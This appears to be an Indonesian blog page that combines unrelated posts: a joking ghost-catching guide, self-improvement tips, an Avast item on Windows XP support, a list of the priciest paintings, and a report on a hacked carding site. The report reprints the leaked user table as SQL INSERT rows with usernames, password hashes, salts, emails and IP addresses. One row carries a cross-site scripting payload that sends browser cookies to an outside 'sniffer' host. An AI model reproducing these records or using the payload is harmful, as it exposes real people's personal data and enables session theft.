Saya perlu memberi tahu sesuatu yang benar-benar jelas sebelum Anda membaca. Panduan ini hanya ditujukan untuk menangkap hantu. Hal ini tidak, saya ulangi TIDAK untuk digunakan pada poltergeist atau hantu yang mampu menggerakkan benda-benda di sekitar karena itu sangat berbahaya. Untuk itu, Anda harus mengetahui panduan yang lain tentang Poltergeist. Untuk amatir di luar sana, agar mampu membedakan kedua hal itu untuk Anda sekarang. Hantu sebenarnya tidak ada, yang ada adalah jin qarin yang mendampingi seseroang selama hidup dan menyerupai roh almarhum yang menolak untuk meninggalkan dunia orang hidup, karena alasan apapun, sementara jin atau setan adalah bentuk-bentuk energi, sesuatu yang hidup dan dapat mempengaruhi alam sadar. Berkonsultasilah dengan profesional (ustadz) jika Anda tidak yakin yang Anda hadapi.

Kuburan selalu tempat yang baik untuk melihat hantu
Perhatian!

Jadi, dengan asumsi Anda sudah berada daerah angker, lakukanlah dengan sangat hati-hati. Hantu bisa licik, dan berbahaya.

Craig Micro Kaset Voice Recorder dengan Indikator LED Recording (CR8003)
Harga Amazon: $ 19,83
Harga: $ 24,99
WARNING:Panduan lengkap cara menangkap hantu

Apa yang akan anda butuhkan? Hal pertama yang Anda akan inginkan adalah kamera manual. Itu harus manual! Hal ini memungkinkan Anda untuk mengontrol setiap aspek dari eksposure. Anda lihat, elektronik memiliki kecenderungan lebih di hadapan hantu. Hantu tidak tertarik untuk berpose dan gambar mereka diambil begitu, menjaganya agar tetap manual akan memberikan Anda lebih. Juga, memiliki camcorder juga tidak  merupakan ide yang buruk. Visi Malam jelas disukai, karena hantu tidak berparade di sekitar cahaya. (tetapi Jika mereka begitu, maka larilah!) :D

Kedua, Anda harus selalu memiliki tape recorder. Tape recorder sangat penting karena bahkan jika Anda tidak dapat mendengar apa-apa, suara mungkin muncul dalam rekaman saat Anda memainkannya kembali. (Ingat adegan dari Sixth Sense ketika Bruce Willis bekerja sedikit trik ini? Ini persis seperti itu!)

Kebutuhan penting ketiga dalam peralatan Anda adalah detektor EMF. Ini adalah suatu keharusan dan alat itu akan mengambil medan listrik di daerah manapun selama beberapa frekuensi yang berbeda. Jika hantu sudah dekat, hal itu akan menyebabkan gangguan dalam bidang listrik dan segera memberitahu Anda.

WARNING:Panduan lengkap cara menangkap hantu
Detector hantu (EMF)

Keempat, dan Anda harus melakukan penarikan dana rekening tabungan Anda untuk membeli alat-alat bagus, inframerah termal scanner dan air ion counter. Keduanya akan dikenakan biaya yang tidak sedikit, lol.. Tapi dengan alat-alat tersebut Anda akan dua langkah lagi menemukan hantu Anda.

Terakhir, untuk tindakan pencegahan ekstra, Anda harus menghafal beberapa ayat perlindungan atau sebuah benda pemukul. Saya tidak mengatakan bahwa semua hantu akan mengganggu karena mereka tidak semuanya begitu, itu lebih baik dan aman daripada menyesal.
LOL

Menangkap Hantu
Yup anda hampir berhasil! Sekarang, bahan-bahan tersebut adalah apa yang akan Anda butuhkan beberapa dokumen dan merasakan kehadiran hantu, tapi bagian terakhir dari teka-teki adalah apa yang Anda gunakan untuk benar-benar menangkap itu. Anda akan harus mengikuti spesifikasi saya secara tepat.

Anda akan membutuhkan sebuah wadah yang terbuat dari logam. (Setiap logam sebenarnya tetap akan bekerja, tapi aku suka tembaga.) Wadah ini harus berukuran 10x12x4 inci tepatnya. (disini dimaksud agar hantu tidak terlalu banyak ruang gerak.) Bila Anda siap, mengisi wadah dengan sebagian tanah. Ini akan memikat hantu ke tempatnya. Setelah Anda konfirmasikan dengan peralatan Anda bahwa hantu itu telah mengambil umpan dan sedang beristirahat dalam wadah Anda, tetapi tidak sebelumnya anda berhati-hati menempatkan tutup dan taburkan garam di atasnya. Setelah menyelesaikan tugas ini, hati-hati mengambil wadah (pastikan untuk meninggalkan garam di atas) ke tanah dan menguburkannya. Ini akan menyebabkan hantu merasa aman di tempatnya dan terkunci selama ratusan tahun atau sampai wadah terganggu. Sebagai tindakan pencegahan ekstra, pastikan tanah itu tidak dekat dengan lokasi asli. Semakin jauh, semakin baik.

PERINGATAN: Hantu sangat berbahaya! Pastikan untuk menyimpannya di tempat yang gelap dan sejuk juga jauh dari jangkauan anak-anak. :v

Katakan
Saya tidak takut ada hantu

Selamat, jika Anda telah mengikuti petunjuk saya dan berhasil mengakali musuh paranormal Anda, Maka anda sedang dalam perjalanan Anda menuju arah untuk menjadi penangkap hantu. Aku benar-benar terkesan.

Satu peringatan kecil ...

BAHAYA: Jangan pernah dalam keadaan apa pun untuk bekerjasama dengan dukun apalagi sampai menjadikan para hantu sebagai client atau tempat anda meminta, ingat dosa syirik tidak akan diampuni.para jin dan setan sangat ahli dalam menipu manusia dan jangan sempat tertipu oleh bujuk rayu mereka. oke cuy...

Selamat berburu :D

Sembilan cara menjadi pribadi yang menyenangkan


Sembilan cara menjadi pribadi yang menyenangkan
Semua orang ingin menjadi orang yang lebih baik, tetapi beberapa orang hanya tidak tahu bagaimana caranya.

Mungkin anda akan berfikir begini, Pada akhir setiap malam hari, saya ingin merefleksikan dan melihat apa yang dapat saya lakukan untuk menjadi orang yang lebih baik. Bukan hanya itu, tapi saya punya tujuan meninggalkan jejak di dunia untuk melakukan hal-hal besar. Dengan menyisihkan waktu setiap hari untuk merenungkan apa perilaku yang baik dan buruk, saya memiliki kesempatan untuk tumbuh.

Tumbuh dewasa, saya bukan yang terbaik. saya akan mengolok-olok orang lain, saya egois, dan saya pikir dunia berputar di sekitar saya. Cepat-maju beberapa tahun dan saya sudah berkembang pesat. Saya bukan lagi sang pengganggu, karena saya telah tumbuh dan belajar apa artinya menjadi orang yang lebih baik.

Setelah mempelajari apa artinya menjadi orang yang lebih baik, saya bisa mengembangkan persona saya ke seseorang atau beberapa orang yang berada disekitar saya. Saya jauh lebih bahagia dengan siapa saya dan saya akan tidak punya masalah mengatakan anak-anak masa depan saya tentang tipe apa dan bagaimana saya.

Berikut adalah 9 cara untuk menjadi orang yang lebih baik melalui pengembangan diri:

1. Bersedialah Untuk Berubah
Untuk menjadi orang yang lebih baik, Anda harus bersedia untuk berubah. Perubahan adalah satu-satunya cara untuk tumbuh dan berkembang menjadi orang yang Anda inginkan. Banyak orang yang menentang perubahan, yang dapat membuat sangat sulit untuk tumbuh. Bila Anda tetap berpikiran terbuka dan bersedia untuk berubah, Anda dapat tumbuh menjadi orang yang Anda harapkan.

2. Berhenti Membuat Alasan
Ketika saya pertama kali memulai usaha kecil saya di SMA, saya selalu membuat alasan setiap kali sesuatu yang tidak beres. Saya akan menyalahkan orang lain, menyalahkan pelanggan, atau siapa pun yang terlibat. Namun, saya tidak akan pernah menyalahkan diri sendiri untuk hal-hal yang tidak beres.

Sebaliknya, belajar bahwa mengambil tanggung jawab atas kesalahan Anda sendiri sangat penting. berhenti membuat alasan, menyalahkan ketika itu benar-benar kesalahan saya, dan mampu mencapai jauh lebih baik. Dengan memahami bahwa saya melakukan kesalahan, saya bisa menggunakan kesalahan saya untuk belajar yang pada gilirannya membantu saya menjadi orang yang lebih baik.

3. Berhenti Marah
Banyak orang membiarkan kemarahan dan kemarahan mengubah keterampilan membuat keputusan mereka. menjadi orang yang marah tumbuh dewasa, tapi saya hanya melihat itu merusak hubungan dengan orang-orang dan meningkatkan tekanan darah .

Mengontrol kemarahan adalah keterampilan yang sangat sulit untuk menguasai, tetapi sangat bermanfaat. Alih-alih marah, saya memutuskan untuk menemukan cara untuk mengubah emosi negatif saya. Marah tidak membantu saya atau memecahkan masalah, hanya menciptakan keadaan lebih jauh dari mereka. Menemukan beberapa cara untuk merilexkan saraf Anda ketika Anda sedang marah, cara ini sangat membantu bagi saya.

4. Berusaha menjadi teladan
Kadang-kadang Anda perlu menjadi teladan bagi seseorang untuk benar-benar bertindak bersama-sama. Setelah saya berusaha berubah dan orang-orang mulai melihat saya, saya menjadi jauh lebih berhati-hati tentang cara saya berperilaku. Saya tidak ingin mengecewakan orang-orang dengan menunjukkan mereka bahwa saya belum dewasa atau model peran yang buruk.

Anda dapat memulai dari yang kecil dan menjadi "kakak" kepada seseorang, pelatih tim anak-anak, atau menjadi model peran untuk anak-anak Anda. Tidak peduli apa yang Anda pilih untuk lakukan,

5. Maafkan Seseorang
Memaafkan seseorang yang menyakiti Anda sangat sulit untuk dilakukan. Ketika saya marah pada seseorang untuk melakukan sesuatu, saya tidak pernah bisa memaafkan mereka. Bahkan jika itu adalah hal kecil, saya akan tahan terhadap mereka selama sisa hidup mereka.

Saya cepat belajar bahwa manusia cenderung membuat kesalahan. Alih-alih memegang kesalahan terhadap mereka untuk hidup, cobalah untuk memaafkan seseorang. Untuk menjadi orang yang lebih baik, pergi melalui masa lalu Anda dan memaafkan seseorang yang melakukan sesuatu untuk menyakiti Anda.

6. Dengarkan Mereka
Orang-orang sangat sibuk dengan karir mereka, keluarga, dan kehidupan. Setiap orang terburu-buru, tetapi orang jarang pernah punya waktu untuk mendengarkan apa yang dikatakan orang lain. Saya belajar bahwa mendengarkan orang dan memberikan semua suara adalah salah satu hal terbesar yang dapat Anda lakukan.

Bertemu beberapa orang yang paling menakjubkan, menutup beberapa transaksi terbesar, dan mengembangkan hubungan yang akan berlangsung seumur hidup saya sekali karena saya mengambil waktu untuk mendengarkan orang. Menjadi pendengar yang baik dapat mengubah hidup Anda dengan cara yang positif.

7. Jujurlah
Orang-orang jujur ​​yang sulit didapat saat ini. Namun, kejujuran adalah obat terbaik untuk setiap situasi. Berjanjilah pada diri sendiri bahwa Anda tidak akan mengatakan kebohongan apapun.

Tantang diri Anda untuk jujur ​​dengan mengembangkan kebiasaan yang baik. Jika Anda seorang pembohong kompulsif, mulai dari yang kecil dengan mencoba untuk jujur ​​selama 1 hari. Setelah Anda mencapai tujuan yang lebih kecil, meningkatkan tujuan dengan 2 atau 3.


8. Berikan Surprise
Apakah Anda memiliki orang yang anda cintai dalam hidup Anda? Apakah itu pasangan / pasangan Anda romantis, anak-anak Anda, atau anggota keluarga, merencanakan kejutan khusus bagi mereka. Rencanakan liburan atau hadiah baru, atau pergi membeli sesuatu untuk mereka.

Salah satu perasaan yang paling berharga di dunia adalah mengetahui bahwa Anda membuat seseorang tersenyum. Mengejutkan seseorang yang istimewa dalam hidup Anda dengan melakukan sesuatu yang luar biasa bagi mereka.


9. Jadilah Religius
Adalah sesuatu yang menyenangkan menjadi orang yang dekat dengan Tuhan, karena sudah barang tentu semua hal diatas telah diajarkan dalam keyakinan anda, dan yakini bahwasannya Allah yang maha baik selalu bersama anda dan mengajarkan pada anda arti menjadi sesuatu yang lebih baik, dan mudah-mudahan tidak disini saja tidak didunia ini saja melainkan juga disana di alam akhirat yang abadi. Amin, semoga bermanfaat, terimakasih telah membaca, Wassalamualaikum

Di ambil dari beberapa sumber acak.

Baca Juga; Ini Penyebab Anda Tidak Merasa Bahagia

AVAST akan terus mendukung Windows XP untuk rumah dan pengguna bisnis

AVAST akan terus mendukung Windows XP untuk rumah dan pengguna bisnis

Dirilis dari avast blog anti virus. Dalam "Years of internet" Microsoft Windows XP telah berjaya selama beberapa tahun. Versi window paling stabil ini dirilis pada bulan Agustus 2001, Dan pada tanggal 8 April 2014 Microsoft berhenti memberikan dukungan dan update keamanan. Update keamanan kerentanan patch yang dapat dimanfaatkan oleh malware dan membantu untuk menjaga pengguna dan data mereka aman. Karena penggunaan XP di rumah, bisnis, sekolah, rumah sakit, dan ATM di seluruh dunia, ini memiliki potensi untuk menciptakan masalah keamanan besar-besaran.

AVAST akan terus mendukung pengguna Windows XP dengan menciptakan modul perlindungan dan deteksi untuk menutupi kerentanan dan masalah keamanan lainnya untuk setidaknya tiga tahun ke depan. Versi terbaru kami, avast! Free Antivirus 2014, bekerja dengan baik dengan mesin yang lebih tua menjalankan Windows XP karena kecepatan, dan konsumsi sumber daya, menjadikannya pilihan yang sempurna bahkan untuk mesin yang lebih tua menjalankan Windows XP. AVAST melindungi lebih banyak pengguna XP daripada yang lain. Anda bisa mendapatkannya gratis sekarang! download avast! Free Antivirus.

Apa artinya ini bagi bisnis di seluruh dunia?
Akhir dukungan Microsoft berarti Anda tidak akan lagi mendapatkan update keamanan atau update informasi dukungan baru untuk Windows - secara gratis. Pelanggan yang sangat besar akan memiliki pilihan untuk berlangganan sebuah program yang disebut "Dukungan Custom," kontrak dukungan setelah pensiun, tapi ini tidak tersedia untuk UKM atau pengguna rumah individu.

Dalam sebuah survei informal mitra AVAST, kita belajar bahwa banyak bisnis masih menggunakan Windows XP dan telah menunda upgrade karena keterbatasan anggaran serta masalah perangkat lunak dan kompatibilitas hardware.

Frank Mayer, mitra AVAST di Yunani mengatakan bahwa sebagian besar pelanggan masih menggunakan Windows XP, tetapi karena krisis finansial yang sedang berlangsung di negeri ini, "Saya melihat ada perubahan dalam waktu dekat. Dalam krisis ini, tidak ada yang mudah menghabiskan uang pada PC baru dan / atau sistem operasi. "

"Di Rumania, kebanyakan komputer di lembaga-lembaga publik masih menggunakan Windows XP, dan sekitar 75% dari mereka tidak bisa mendukung upgrade ke Windows 7 atau 8 karena keterbatasan hardware," kata Claudiu Chirita Easy Media SRL. "Situasi yang sama hadir di segmen SOHO di mana upgrade software akan melibatkan upgrade hardware atau penggantian.

Berapa banyak yang masih menggunakan Windows XP? Apa risikonya?
Studi menunjukkan bahwa hampir 30% dari pengguna di seluruh dunia masih menggunakan Windows XP sebagai Januari 2014. Database AVAST menunjukkan bahwa 23,6% dari 211 juta pengguna yang masih menjalankan Windows XP.

"Saya pikir pengguna tidak cukup memahami penghentian dukungan untuk XP," kata Mladen Dumitraskovic dari StudioNexT di Serbia. "Mereka perlu mempertimbangkan konsekuensi yang mungkin dan mencari solusi yang tepat. Keputusan AVAST untuk mendukung XP dalam tiga tahun ke depan ini disambut baik, dan saya pikir itu akan mengejutkan pelanggan tetap kami. "

Di Amerika Serikat, pelanggan bisnis umumnya merasa prihatin tentang keamanan mereka, namun rencana mereka menggembirakan. "Sangat sedikit tidak akan mengubah di beberapa titik, kecuali untuk sistem off-line," kata JR Guthrie, presiden Advantage Micro Corporation.

Itu bagus untuk mendengar, karena data AVAST telemetri menunjukkan bahwa pengguna XP adalah 6 kali lebih mungkin untuk mendapatkan diserang dari pengguna Windows 7.

Pengguna Internet Explorer: Beralihlah ke baru, browser yang aman
Banyak pengguna XP, seperti di Rusia, masih menjalankan Windows XP, tetapi mereka "acuh tak acuh" tentang masalah keamanan, kata George Salnik, Insinyur Umum untuk perusahaan BelRus di Rusia. "Rencana mereka hanya Nol persen untuk meng-upgrade dari Windows XP. Hanya ketika mereka membeli PC baru yang akan mereka menerima OS baru secara otomatis. Klien memiliki anggapan: Mengapa mengubah sesuatu ketika semuanya bekerja "?

Di Ukraina, di mana ketegangan politik meningkat, tidak ada pelanggan Idealsoft sedang mempertimbangkan upgrade dari Windows XP belum. Setelah tahun 2015, ketika dukungan Microsoft Security Essentials berakhir, "Lalu mereka akan berpikir tentang hal ini. Situasi di negara ini tidak stabil saat ini, "kata Evgen Shakula.

Sesuatu yang dapat membantu para pengguna menjadi lebih aman adalah beralih browser mereka. Pengguna XP sering juga menggunakan Internet Explorer, yang dapat menjadi resiko keamanan yang parah. Saat ini, IE 8 adalah versi terbaru yang akan berjalan pada Windows XP, yang berarti bahwa versi tua itu tidak lagi menerima pembaruan penting.

Saran kami: Jika Anda harus tetap menggunakan Windows XP, beralih ke Google Chrome. Chrome ini bisa dibilang browser yang paling aman untuk Windows XP, dan seperti Avast, dijamin untuk mendukung XP bergerak maju.

Terima kasih telah menggunakan avast! Antivirus dan merekomendasikan kami ke teman dan keluarga. Untuk semua berita, menyenangkan dan kontes informasi terbaru, ikuti kami di Facebook, Twitter dan Google+. Pemilik bisnis - memeriksa produk bisnis kami.

10 lukisan termahal yang pernah terjual

Di bawah ini adalah daftar lukisan paling mahal yang pernah terjual. Harga yang harus dibayar dan tahun pembelian. so langsung saja baca karena saya benci basa-basi hahaha

1. $250 juta dollar atau sekitar Rp.2.958.750.000.000 , judul; The Card Players karya Paul Cézanne (2011)


10 lukisan termahal yang pernah terjual

2. $155 juta dollar atau Rp.1.834.425.000.000, berjudul La Rêve karya Pablo Picasso (2013)

10 lukisan termahal yang pernah terjual

3. $142.4 juta dollar atau Rp.1.685.304.000.000, berjudul Three Studies of Lucian Freud karya Francis Bacon (2013)

10 lukisan termahal yang pernah terjual

4. $140 juta dollar atau Rp.1.656.900.000.000 berjudul No. 5, 1948 karya Jackson Pollock (2006)

10 lukisan termahal yang pernah terjual

5. $137.5 juta dollar atau Rp.1.627.312.500.000 berjudul Woman III karya Willem de Kooning (2006)

10 lukisan termahal yang pernah terjual

6. $135 juta dollar atau Rp.1.597.725.000.000 berjudul Adele Bloch-Bauer I karya Gustav Klimt (2006)

10 lukisan termahal yang pernah terjual

7. $119.9 juta dollar atau Rp.1.419.016.500.000 berjudul The Scream karya Edvard Munch (2012)

10 lukisan termahal yang pernah terjual

8. $110 juta dollar atau Rp.1.301.850.000.000 berjudul "Flag" karya Jasper Johns (2010)

10 lukisan termahal yang pernah terjual

9. $106.5 juta dollar atau rp.1.260.427.500.000, berjudul Nude, Green Leaves and Bust karya Pablo Picasso (2010)

10 lukisan termahal yang pernah terjual

10. $104 juta dollar atau Rp.1.230.840.000.000, berjudul Boy with a Pipe karya Pablo Picasso (2004)

10 lukisan termahal yang pernah terjual

Nah..murah kan..?? yuk kita beli :p

Situs Black market dibobol


Situs Black market dibobol
Sebuah situs web yang dikenal sebagai blackmarketnya Kartu Kredit bajakan telah di-hack dan data yang ada telah dibocorkan oleh seorang hacker yang menggunakan nama anonymous sebagai Hex000101.

Menurut CyberNewsWarInfo, "Serangan itu pertama kali diumumkan beberapa hari yang lalu pada tanggal 25 ketika hex memasang link pastebin dengan mengklaim informasi pemilik website dan juga beberapa email dan bukti kebocoran datang dan hari ini juga Hex000101 memposting lebih detail kartu kredit dari 100 orang-orang yang diduga menggunakan layanan ilegal.

Beberapa detik yang lalu Hex000101 telah membocorkan data lainnya dari situs blackmarket yang sama, kali ini login dan password dari orang-orang yang menggunakan layanan ilegal website berupa akun-akun PayPal.

Beberapa data bisa anda lihat dibawah ini.

By- Hex00010

INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('953', 'Admin', 'a939232b4e8079be75b3b83dae35af13', '883', '1', 'quitpp@gmail.com', '', '', '5', '0', '1329089830', '190.166.230.250');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('954', 'megganjr', 'b0ff090f32a944b8c3dde11da7601205', '279', '3', 'rayodesol00@hotmail.com', '', '', '0', '0', '1329334971', '186.78.232.120');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('955', 'dimaz', '62854fa586564d3a1743ec3f0cbbb938', '418', '3', 'club2011@hotmail.co.uk', '', '', '0', '0', '1329396863', '176.67.160.180');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('956', 'ladiesmen', 'c5b9659ee8c0ec453a668fd136eb0f8c', '976', '3', 's_mc97@yahoo.com', '', '', '0', '0', '1329519381', '175.145.61.7');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('957', 'Palaciego', 'b9b14c72b12a6450a59f43da7ce56d92', '827', '3', 'supersonick@hotmail.es', '', '', '0', '0', '1329563274', '95.20.79.202');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('958', 'akr2010', '000aa392c4db8f6efdf47e9621f7bdbb', '416', '3', 'acb2k9@gmail.com', '', '', '0', '0', '1329721514', '190.51.241.209');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('959', 'ninjaninja', 'fc58d6208bb1e6f82cae75f3ab197ea1', '992', '3', 'ninjajri555@yahoo.com', '', '', '0', '0', '1329728650', '178.73.221.23');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('960', 'Musik', 'aa01295acc2647187535cf8238cd9bcf', '727', '3', 'roargasm@live.com', '', '', '0', '0', '1329774436', '216.231.134.98');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('961', 'sociopath', 'f0527d0fd2150adc3dd8f7be45600f01', '140', '3', 'exchangec@ymail.com', '', '', '0', '0', '1329782369', '95.211.27.23');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('962', 'bentheman', 'e17221ea9e21de3a0601f5eb9818ac0d', '299', '3', 'belgei@hotmail.com', '', '', '0', '0', '1329956961', '84.28.210.53');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('963', 'linuxblt', '456f96316161598d1235742e1f176f21', '808', '3', 'linuxblt@hotmail.com', '', '', '0', '0', '1330044725', '190.202.182.168');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('964', 'kaponi', 'e47e052020f60a36897a6991dc596a2c', '661', '3', 'conectagames@gmail.com', '', '', '0', '0', '1330045828', '200.82.169.62');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('965', 'firelord', 'e524c434ad5d863c06ea8e12b6638823', '395', '3', 'emr_firelord@hotmail.com', '', '', '0', '0', '1330051404', '189.183.224.142');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('966', 'cyb3r', '5d30fa79be44731ff0abfc5c012d7718', '621', '3', 'cyb3r@dr.com', '', '', '0', '0', '1330054340', '95.154.230.115');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('967', 'qwertyuiop', 'be14a3ac8531dca52b15907863ef6e7e', '998', '3', 'qwe@yahoo.com', '\"><script>img = new Image(); img.src = \"http://hacker-lab.com/sniffer/images/1111_1.gif?\"+document.cookie;</script>', '', '0', '0', '1330071038', '95.84.54.200');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('968', 'CremaDeMani', '4dd266758febedb30e1d899a81afa3fc', '734', '3', 'ilsfer@hotmail.com', '', '', '0', '0', '1330129484', '186.115.109.251');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('969', 'thegame213', '3f77beb05ea7b6e883313ac1f61838b9', '990', '3', 'charles.louboutin@yahoo.com', '', '', '0', '0', '1330138456', '');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('970', 'fatalko0', '096f2785a875723c24aafd694b739f8b', '432', '3', 'fatalko0@gmail.com', '', '', '0', '0', '1330175486', '91.185.59.28');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('971', 'Pandarian', '73d8273a584e7357b1a74d8a4a289abd', '880', '3', 'dorotheahanson@yahoo.com', '', '', '0', '0', '1330195561', '64.31.33.127');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('972', 'Stanford', '607380a67abe6308e7c7381ccae010e3', '774', '3', 'stanford666@live.com', '', '', '0', '0', '1330211410', '189.176.149.104');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('973', 'drac', '32539b1e38955249c51d119f13153d47', '155', '3', 'cpdracula@gmail.com', '', '', '0', '0', '1330228301', '192.162.102.131');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('974', 'Stakkato', 'c89ffde54b82cbece748d6b2836ad3c4', '443', '3', 'stakkato@live.com', '', '', '0', '0', '1330238778', '64.131.178.20');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('975', 'asdasd', 'df98fb3eba3123faf181327de0100100', '864', '3', '12345@12345.com', '', '', '0', '0', '1330310515', '95.22.235.190');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('976', 'masterccmx', '462feb299058cd5a9945b9bd0cfb29b9', '180', '3', 'masterccmx@live.com', '', '', '0', '0', '1330317376', '200.92.104.57');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('977', 'jimiconway', 'ad9194b9002161c7f5bbbb06c6c98339', '807', '3', 'fhuttons@gmail.com', '', '', '0', '0', '1330347757', '82.25.50.81');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('978', 'Alan', 'e888bebe0ac4bb0bf7a87bdfec8fbc46', '985', '3', 'alanhernans@hotmail.com', '', '', '0', '0', '1330389466', '190.50.179.21');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('979', 'super8854', '26a550b247f6c6c3cc577c6225f3de4b', '446', '3', 'super885418@hotmail.com', '', '', '0', '0', '1330393337', '122.159.11.133');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('980', 'Syc0', '519dac3817a3e2a0c7fc06f15238ed4b', '739', '3', 'sycokillah@Gmail.com', '', '', '0', '0', '1330439741', '158.94.72.90');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('981', 'DreamXWork', 'e1fcc367363dfed5c5cb08d979e1552c', '476', '3', 'dream.work@live.com', '', '', '0', '0', '1330444907', '174.113.220.3');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('982', 'epicfail', 'df17f773717d666a0aaf1c3ce0b391a1', '600', '3', 'mailman@mailinator.com', '', '', '0', '0', '1330545889', '72.43.130.149');
INSERT INTO `users`(`user_id`, `user_name`, `user_pass`, `user_salt`, `user_groupid`, `user_mail`, `user_yahoo`, `user_icq`, `user_balance`, `user_referenceid`, `user_regdate`, `user_ipaddress`) VALUES ('983', 'dacarter', 'aaf8e86ddbea98296076ab40bf2319e3', '998', '3', 'ey280@hotmail.co.uk', '', '', '0', '0', '1330591294', '109.152.184.65');
